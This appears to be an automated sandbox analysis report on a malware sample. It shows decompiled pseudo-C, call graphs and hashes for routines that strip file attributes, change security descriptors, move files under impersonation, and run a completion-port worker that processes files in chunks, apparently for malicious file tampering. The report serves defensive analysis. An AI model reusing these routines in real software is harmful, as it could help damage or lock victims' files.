                                                                                                                                                            control_flow_graph 316 9c2799-9c27a8 317 9c27ae-9c27af 316->317 318 9c290f-9c2915 316->318 319 9c27b0-9c27e6 call 9c5de2 317->319 322 9c27ea-9c27ec 319->322 323 9c27ee-9c27f2 VariantClear 322->323 324 9c27f8-9c282e call 9c5de2 322->324 323->324 328 9c2834-9c2847 324->328 329 9c2903-9c2907 324->329 332 9c284d-9c2887 call 9c5de2 328->332 333 9c28f9-9c28fd VariantClear 328->333 329->319 330 9c290d-9c290e 329->330 330->318 337 9c289e-9c28d7 call 9c5de2 332->337 338 9c2889-9c2898 call 9c2cd2 VariantClear 332->338 333->329 344 9c28ee-9c28f0 337->344 345 9c28d9-9c28e8 StrToIntW VariantClear 337->345 338->337 344->333 346 9c28f2-9c28f8 call 9c41bb 344->346 345->344 346->333
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                            • Opcode ID: 6f7a1d93e60f227a259aa4b26b3218208e333f2e9c08e18bc984500ce3cd822c
                                                                                                                                                            • Instruction ID: d37ca9eccefb20850e95768bb6628b0de58c19e48c540b7f64029e9a80e5b20f
                                                                                                                                                            • Opcode Fuzzy Hash: 6f7a1d93e60f227a259aa4b26b3218208e333f2e9c08e18bc984500ce3cd822c
                                                                                                                                                            • Instruction Fuzzy Hash: 6C415471A50308BFEB10DFA4CC8AFAE777CBF98B04F114519F611EB191E6B0A9458761
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 415 9c2f05-9c2f2e call 9c7845 418 9c2f47-9c2f50 415->418 419 9c2f30-9c2f33 415->419 420 9c2f5c-9c2f6e call 9c74f0 418->420 421 9c2f52 418->421 422 9c2f35 419->422 423 9c2f70-9c2f9a call 9c7884 call 9c786b 419->423 434 9c2fee-9c2ff2 420->434 426 9c2f59 421->426 427 9c2f54-9c2f57 421->427 424 9c2f37-9c2f3e 422->424 425 9c2f40-9c2f41 call 9c4b21 422->425 439 9c2f9c-9c2fa3 423->439 440 9c2fa5 423->440 424->423 424->425 433 9c2f46 425->433 426->420 427->420 427->426 433->418 436 9c2fcd-9c2fd5 RtlGetLastWin32Error 434->436 437 9c2ff4-9c3013 434->437 442 9c2fc6-9c2fc8 436->442 443 9c2fd7-9c2feb call 9c568d call 9c74f0 436->443 441 9c3082-9c308f call 9c756b 437->441 439->440 444 9c2fa7-9c2fb0 call 9c4b21 439->444 440->444 449 9c3094-9c3099 441->449 446 9c30a8-9c30ae 442->446 443->434 444->418 457 9c2fb2-9c2fc4 call 9c6962 444->457 452 9c309f-9c30a5 call 9c30af 449->452 453 9c3015-9c3025 RtlGetLastWin32Error 449->453 467 9c30a7 452->467 455 9c305a-9c3064 call 9c7504 453->455 456 9c3027-9c302a 453->456 455->467 460 9c302c-9c3038 call 9c55d8 456->460 461 9c3066-9c3069 456->461 457->418 457->442 460->452 473 9c303a-9c3044 GetFileAttributesW 460->473 469 9c307e-9c3080 461->469 470 9c306b-9c307d call 9c5a21 call 9c568d 461->470 467->446 469->441 470->469 473->455 476 9c3046-9c3048 473->476 476->469 478 9c304a-9c3058 SetFileAttributesW 476->478 478->455 478->469
                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                            			E009C2F05(signed int __edx, void* __eflags, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                            				char _v64;
                                                                                                                                                            				char _v240;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				void* _t26;
                                                                                                                                                            				void* _t28;
                                                                                                                                                            				long _t29;
                                                                                                                                                            				void* _t34;
                                                                                                                                                            				long _t35;
                                                                                                                                                            				void* _t37;
                                                                                                                                                            				void* _t38;
                                                                                                                                                            				signed char _t42;
                                                                                                                                                            				int _t43;
                                                                                                                                                            				signed int _t47;
                                                                                                                                                            				void* _t50;
                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                            				WCHAR* _t54;
                                                                                                                                                            				signed int _t57;
                                                                                                                                                            				signed int _t67;
                                                                                                                                                            				signed int _t69;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				void* _t73;
                                                                                                                                                            				intOrPtr* _t74;
                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                            				intOrPtr _t79;
                                                                                                                                                            
                                                                                                                                                            				_t66 = __edx;
                                                                                                                                                            				_t69 = 1;
                                                                                                                                                            				_t26 = E009C7845(_a8, 0x80000000, 1, 3, 0); // executed
                                                                                                                                                            				_t71 = _t26;
                                                                                                                                                            				_t74 = _t73 + 0x14;
                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                            					L5:
                                                                                                                                                            					_t79 = _a16;
                                                                                                                                                            					_t53 = 0x100000;
                                                                                                                                                            					if(_t79 <= 0 && (_t79 < 0 || _a12 < 0x100000)) {
                                                                                                                                                            						_t53 = _a12;
                                                                                                                                                            					}
                                                                                                                                                            					_t70 = _a4;
                                                                                                                                                            					_t8 = _t53 + 0x160; // 0x100160
                                                                                                                                                            					_t28 = E009C74F0(_a4, _t8);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t72 = _t28;
                                                                                                                                                            						if(_t72 != 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_t29 = RtlGetLastWin32Error();
                                                                                                                                                            						__eflags = _t29 - 8;
                                                                                                                                                            						if(_t29 != 8) {
                                                                                                                                                            							L15:
                                                                                                                                                            							return 0;
                                                                                                                                                            						}
                                                                                                                                                            						E009C568D(_t29, 0x64);
                                                                                                                                                            						_t14 = _t53 + 0x160; // 0x100160
                                                                                                                                                            						_t28 = E009C74F0(_t70, _t14);
                                                                                                                                                            						_t74 = _t74 + 0xc;
                                                                                                                                                            					}
                                                                                                                                                            					_t57 = 3;
                                                                                                                                                            					 *((intOrPtr*)(_t72 + 0x158)) = _t53;
                                                                                                                                                            					_t54 = _a8;
                                                                                                                                                            					_push(_t57);
                                                                                                                                                            					 *((intOrPtr*)(_t72 + 0x154)) = 0;
                                                                                                                                                            					 *((intOrPtr*)(_t72 + 0x150)) = 0;
                                                                                                                                                            					_v8 = _t57;
                                                                                                                                                            					_push(0);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_push(0xc0000000);
                                                                                                                                                            						_push(_a16);
                                                                                                                                                            						_push(_a12);
                                                                                                                                                            						_push(_t54);
                                                                                                                                                            						_push(_t72); // executed
                                                                                                                                                            						_t34 = E009C756B(); // executed
                                                                                                                                                            						_t74 = _t74 + 0x1c;
                                                                                                                                                            						_t82 = _t34;
                                                                                                                                                            						if(_t34 != 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_t35 = RtlGetLastWin32Error();
                                                                                                                                                            						_t67 = _v8;
                                                                                                                                                            						_t58 = _t67;
                                                                                                                                                            						_t66 = _t67 - 1;
                                                                                                                                                            						_v8 = _t67 - 1;
                                                                                                                                                            						__eflags = _t67;
                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                            							L26:
                                                                                                                                                            							E009C7504(_t70, _t72);
                                                                                                                                                            							_t37 = 0;
                                                                                                                                                            							L32:
                                                                                                                                                            							return _t37;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _t35 - 5;
                                                                                                                                                            						if(_t35 != 5) {
                                                                                                                                                            							__eflags = _t35 - 0x20;
                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                            								_t38 = E009C5A21(_t54, _t58, _t66, _t72, __eflags, _t54);
					*_t74 = 0x3e8;
					E009C568D(_t38);
				}
				L29:
				_push(3);
				_push(0);
				continue;
			}
			__eflags = E009C55D8(_t58, _t54, 0);
			if(__eflags == 0) {
				break;
			}
			_t42 = GetFileAttributesW(_t54);
			__eflags = _t42 - 0xffffffff;
			if(_t42 == 0xffffffff) {
				goto L26;
			}
			__eflags = _t42 & 0x00000001;
			if((_t42 & 0x00000001) == 0) {
				goto L29;
			}
			_t43 = SetFileAttributesW(_t54, 0x80);
			__eflags = _t43;
			if(_t43 != 0) {
				goto L29;
			}
			goto L26;
		}
		E009C30AF(_t66, _t82, _t72);
		_t37 = _t72;
		goto L32;
	}
	_t77 = _a16;
	if(_t77 > 0 || _t77 >= 0 && _a12 >= 0xe8) {
		E009C7884(_t71, 0xffffff18, 0xffffffff, 2);
		_t47 = E009C786B(_t71, &_v240, 0xe8, &_v8);
		_t74 = _t74 + 0x20;
		__eflags = _t47;
		if(_t47 == 0) {
			L12:
			_t69 = 0;
			L13:
			E009C4B21(_t71);
			__eflags = _t69;
			if(_t69 == 0) {
				goto L5;
			}
			_t50 = E009C6962(0, &_v64, 0x20);
			_t74 = _t74 + 0xc;
			__eflags = _v24 - _t50;
			if(_v24 != _t50) {
				goto L5;
			}
			goto L15;
		}
		__eflags = _v8 - 0xe8;
		if(_v8 == 0xe8) {
			goto L13;
		}
		goto L12;
	} else {
		E009C4B21(_t71); // executed
		goto L5;
	}
}































                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 009C7845: CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000,?,009C417E,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009C785B
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C2FCD
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3015
                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 009C303B
                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080), ref: 009C3050
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: File$AttributesErrorLastWin32$Create
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1515811453-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 479 9c550a-9c5529 RegOpenKeyExW 480 9c552b-9c5543 RegQueryValueExW 479->480 481 9c5580-9c5587 479->481 482 9c5545-9c5547 480->482 483 9c5576-9c557f RegCloseKey 480->483 482->483 484 9c5549-9c5555 call 9c47ab 482->484 483->481 484->483 487 9c5557-9c556b RegQueryValueExW 484->487 487->483 488 9c556d-9c5574 call 9c47f8 487->488 488->483
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C550A(void* _a4, short* _a8, short* _a12, int* _a16, int* _a20) {
                                                                                                                                                            				void* _v8;
                                                                                                                                                            				long _t13;
                                                                                                                                                            				long _t15;
                                                                                                                                                            				long _t18;
                                                                                                                                                            				int* _t27;
                                                                                                                                                            				char* _t30;
                                                                                                                                                            
                                                                                                                                                            				_t30 = 0;
                                                                                                                                                            				_t13 = RegOpenKeyExW(_a4, _a8, 0, 1,  &_v8); // executed
                                                                                                                                                            				if(_t13 != 0) {
                                                                                                                                                            					L7:
                                                                                                                                                            					return _t30;
                                                                                                                                                            				}
                                                                                                                                                            				_t27 = _a20;
                                                                                                                                                            				_t15 = RegQueryValueExW(_v8, _a12, 0, _a16, 0, _t27); // executed
                                                                                                                                                            				if(_t15 == 0 &&  *_t27 != 0) {
                                                                                                                                                            					_t30 = E009C47AB( *_t27);
                                                                                                                                                            					if(_t30 != 0) {
                                                                                                                                                            						_t18 = RegQueryValueExW(_v8, _a12, 0, _a16, _t30, _t27); // executed
                                                                                                                                                            						if(_t18 != 0) {
                                                                                                                                                            							E009C47F8(_t30);
                                                                                                                                                            							_t30 = 0;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				RegCloseKey(_v8); // executed
                                                                                                                                                            				goto L7;
                                                                                                                                                            			}










                                                                                                                                                            APIs
                                                                                                                                                            • RegOpenKeyExW.KERNEL32(0000000C,0000000F,00000000,00000001,?,009D0270,00000000,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C5521
                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,80000002,?,?,009C233B,80000002,?,?,?,?,009D0270), ref: 009C553B
                                                                                                                                                            • RegCloseKey.KERNEL32(?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C,0000000F,0000000C,?), ref: 009C5579
                                                                                                                                                              • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                              • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            • RegQueryValueExW.KERNEL32(?,00000A8C,00000000,009D0270,00000000,?,?,?,009C233B,80000002,?,?,?,?,009D0270,00000A8C), ref: 009C5563
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HeapQueryValue$CloseCreateOpenProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3348224683-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            control_flow_graph 491 9c56da-9c56ea 492 9c56ec-9c5701 GetCurrentProcess OpenProcessToken 491->492 493 9c572e-9c5746 SetNamedSecurityInfoW 491->493 494 9c5748-9c574a 492->494 495 9c5703-9c571d GetTokenInformation 492->495 493->494 496 9c574c 493->496 497 9c574e-9c5752 494->497 495->494 498 9c571f-9c5728 call 9c4b21 495->498 496->497 500 9c572d 498->500 500->493
                                                                                                                                                            C-Code - Quality: 36%
                                                                                                                                                            			E009C56DA(intOrPtr _a4) {
                                                                                                                                                            				void* _v8;
                                                                                                                                                            				long _v12;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				int _t12;
                                                                                                                                                            
                                                                                                                                                            				_push(_t14);
                                                                                                                                                            				if( *0x9d1d4c != 0) {
                                                                                                                                                            					L4:
                                                                                                                                                            					 *0x9d10b4(_a4, 1, 1,  *0x9d1d50, 0, 0, 0); // executed
                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                            						_t8 = 1;
                                                                                                                                                            					} else {
                                                                                                                                                            						goto L5;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
                                                                                                                                                            						L5:
                                                                                                                                                            						_t8 = 0;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t12 = GetTokenInformation(_v8, 1, 0x9d1d50, 0x200,  &_v12); // executed
                                                                                                                                                            						if(_t12 == 0) {
                                                                                                                                                            							goto L5;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *0x9d1d4c = 1; // executed
                                                                                                                                                            							E009C4B21(_v8); // executed
                                                                                                                                                            							goto L4;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,?,?,?,009C560D,?,?,?,009C2D35,?,00000001), ref: 009C56EC
                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,009C560D,?,?,?,009C2D35,?,00000001), ref: 009C56F9
                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),009D1D50,00000200,?,?,?,?,009C560D,?,?,?,009C2D35,?,00000001), ref: 009C5715
                                                                                                                                                              • Part of subcall function 009C4B21: FindCloseChangeNotification.KERNEL32(00000000,?,009C7476,00000000,?,009C74D2,00000000,00000000,?,009C33C5,?,00000000,00000000,009C3571,00000000), ref: 009C4B2D
                                                                                                                                                            • SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000001,00000000,00000000,00000000,00000000,?,?,?,009C560D,?,?,?,009C2D35,?), ref: 009C573E
Memory Dump Source
• Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
• Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ProcessToken$ChangeCloseCurrentFindInfoInformationNamedNotificationOpenSecurity
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 160603818-0
                                                                                                                                                            • Opcode ID: 0048ea6286ab907acb46e3e524ec46aade8e1e3b078d180d3be2d468278fbc67
                                                                                                                                                            • Instruction ID: f268b04480e7bdb7eaf475108908baa8d59f2f30ee975da603e0571c7b749c60
                                                                                                                                                            • Opcode Fuzzy Hash: 0048ea6286ab907acb46e3e524ec46aade8e1e3b078d180d3be2d468278fbc67
                                                                                                                                                            • Instruction Fuzzy Hash: 40016276A59118FFEB205BA1EC09FBF7BADEB05751F00001AB905D10A0D760ADC0EBB2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 501 9c7939-9c794d MoveFileW 502 9c794f-9c7957 RtlGetLastWin32Error 501->502 503 9c7975 501->503 502->503 504 9c7959-9c7960 call 9c509b 502->504 505 9c7977-9c7979 503->505 504->505 508 9c7962-9c7970 MoveFileW RevertToSelf 504->508 508->503
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E009C7939(WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                            				int _t5;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				void* _t11;
                                                                                                                                                            				int _t12;
                                                                                                                                                            
                                                                                                                                                            				_t5 = MoveFileW(_a4, _a8); // executed
                                                                                                                                                            				_t12 = _t5;
                                                                                                                                                            				if(_t12 != 0 || RtlGetLastWin32Error() != 3) {
                                                                                                                                                            					L4:
                                                                                                                                                            					return _t12;
                                                                                                                                                            				}
                                                                                                                                                            				_t8 = E009C509B(_t11);
                                                                                                                                                            				if(_t8 != 0) {
                                                                                                                                                            					_t12 = MoveFileW(_a4, _a8);
                                                                                                                                                            					RevertToSelf();
                                                                                                                                                            					goto L4;
                                                                                                                                                            				}
                                                                                                                                                            				return _t8;
                                                                                                                                                            			}








                                                                                                                                                            APIs
                                                                                                                                                            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009C7943
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C794F
                                                                                                                                                              • Part of subcall function 009C509B: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?,?,?,009C7BCB), ref: 009C50DC
                                                                                                                                                            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009C7968
                                                                                                                                                            • RevertToSelf.ADVAPI32(?,009C31DE,50C2440F,00000000,00000000,?,?,00000000,009C364E,?,?), ref: 009C7970
Memory Dump Source
• Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
• Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileMove$ErrorLastOpenProcessRevertSelfWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3666651738-0
                                                                                                                                                            • Opcode ID: e54b2e28efc97fbd385420ebb6aa7156231df30a56e15eebf13535da0146b4f2
                                                                                                                                                            • Instruction ID: b8b304564528a359445dfaa95c0245f9be69c09948f20494354bfe09e18ef0d8
                                                                                                                                                            • Opcode Fuzzy Hash: e54b2e28efc97fbd385420ebb6aa7156231df30a56e15eebf13535da0146b4f2
                                                                                                                                                            • Instruction Fuzzy Hash: AEE04F36E48519778F213BF0DC04F59BB589F423B0B014029FE18C6221CA31DDD0ABD2
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                            			E009C3571(intOrPtr _a4) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				char _v12;
                                                                                                                                                            				char _v16;
                                                                                                                                                            				void* _t32;
                                                                                                                                                            				long _t34;
                                                                                                                                                            				void* _t41;
                                                                                                                                                            				void* _t43;
                                                                                                                                                            				void* _t48;
                                                                                                                                                            				char _t53;
                                                                                                                                                            				signed int _t56;
                                                                                                                                                            				char _t61;
                                                                                                                                                            				signed int _t64;
                                                                                                                                                            				signed int _t65;
                                                                                                                                                            				void* _t67;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                            
                                                                                                                                                            				SetThreadPriority(GetCurrentThread(), 2); // executed
                                                                                                                                                            				_t68 = _a4;
                                                                                                                                                            				_t32 = E009C7518(_a4,  &_v12,  &_v16,  &_v8, 0xffffffff);
                                                                                                                                                            				_t70 = _t69 + 0x14;
                                                                                                                                                            				if( *0x9d1d04 == 0) {
                                                                                                                                                            					do {
                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                            							_t34 = RtlGetLastWin32Error();
                                                                                                                                                            							__eflags = _t34 - 0x26;
                                                                                                                                                            							if(_t34 == 0x26) {
                                                                                                                                                            								E009C2EB9(_t68, _v8);
                                                                                                                                                            								goto L22;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_push(0);
                                                                                                                                                            							E009C75E6(_v8, _v12);
                                                                                                                                                            							_t61 = _v8;
                                                                                                                                                            							_t70 = _t70 + 0xc;
                                                                                                                                                            							if( *0x9d2278 == 2 &&  *((intOrPtr*)(_t61 + 0x150)) == 2) {
                                                                                                                                                            								 *((intOrPtr*)(_t61 + 0x20)) =  *((intOrPtr*)(_t61 + 0x20)) - _v12;
                                                                                                                                                            								asm("sbb [ecx+0x24], ebx");
                                                                                                                                                            								_t53 = _v8;
                                                                                                                                                            								_t64 =  *0x9d227c; // 0x0
                                                                                                                                                            								_t65 = _t64 << 0x14;
                                                                                                                                                            								_t76 =  *((intOrPtr*)(_t53 + 0x24));
                                                                                                                                                            								if(_t76 < 0 || _t76 <= 0 &&  *((intOrPtr*)(_t53 + 0x20)) <= _t65) {
                                                                                                                                                            									_push( *((intOrPtr*)(_t53 + 0x24)));
                                                                                                                                                            									E009C75E6(_t53,  *((intOrPtr*)(_t53 + 0x20)));
                                                                                                                                                            									_t70 = _t70 + 0xc;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(0);
                                                                                                                                                            									E009C75E6(_t53, _t65);
                                                                                                                                                            									_t66 = _v8;
                                                                                                                                                            									_t70 = _t70 + 0xc;
                                                                                                                                                            									_t56 =  *0x9d227c; // 0x0
                                                                                                                                                            									 *((intOrPtr*)(_t66 + 0x20)) =  *((intOrPtr*)(_v8 + 0x20)) - (_t56 << 0x14);
                                                                                                                                                            									asm("sbb [ecx+0x24], ebx");
                                                                                                                                                            								}
                                                                                                                                                            								_t61 = _v8;
                                                                                                                                                            							}
                                                                                                                                                            							_t41 =  *((intOrPtr*)(_t61 + 0x154)) - 1;
                                                                                                                                                            							if(_t41 == 0) {
                                                                                                                                                            								E009C326E(_t68, _t61, 2); // executed
                                                                                                                                                            								goto L19;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t43 = _t41 - 1;
                                                                                                                                                            								if(_t43 == 0) {
                                                                                                                                                            									__eflags =  *0x9d2278 - 1; // 0x0
                                                                                                                                                            									_t67 = 3;
                                                                                                                                                            									_t46 =  ==  ? _t67 : 1;
                                                                                                                                                            									E009C36C9(_t67, __eflags, _t61, _v12,  ==  ? _t67 : 1); // executed
                                                                                                                                                            									L19:
                                                                                                                                                            									_t70 = _t70 + 0xc;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t48 = _t43 - 1;
                                                                                                                                                            									if(_t48 == 0) {
                                                                                                                                                            										E009C3740(_t61, 4); // executed
                                                                                                                                                            										goto L22;
                                                                                                                                                            									} else {
                                                                                                                                                            										_t81 = _t48 == 1;
                                                                                                                                                            										if(_t48 == 1) {
                                                                                                                                                            											E009C3188(_t81, _t68, _t61); // executed
                                                                                                                                                            											L22:
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t32 = E009C7518(_t68,  &_v12,  &_v16,  &_v8, 0xffffffff);
                                                                                                                                                            						_t70 = _t70 + 0x14;
                                                                                                                                                            						_t82 =  *0x9d1d04; // 0x1
                                                                                                                                                            					} while (_t82 == 0);
                                                                                                                                                            				}
                                                                                                                                                            				asm("lock dec dword [esi+0x8]");
                                                                                                                                                            				return 0;
                                                                                                                                                            			}






















                                                                                                                                                            APIs
                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 009C357A
                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000,00000002), ref: 009C3580
                                                                                                                                                              • Part of subcall function 009C7518: GetQueuedCompletionStatus.KERNEL32(?,?,?,?,?,?,009C359D,?,?,?,?,000000FF), ref: 009C752D
                                                                                                                                                            • RtlGetLastWin32Error.NTDLL ref: 009C3683
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$CompletionCurrentErrorLastPriorityQueuedStatusWin32
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3344855219-0
                                                                                                                                                            • Opcode ID: 4dfe0a1c26845a9725d4f0e736236785bf6ecb1643ab2190c902e531921a12b8
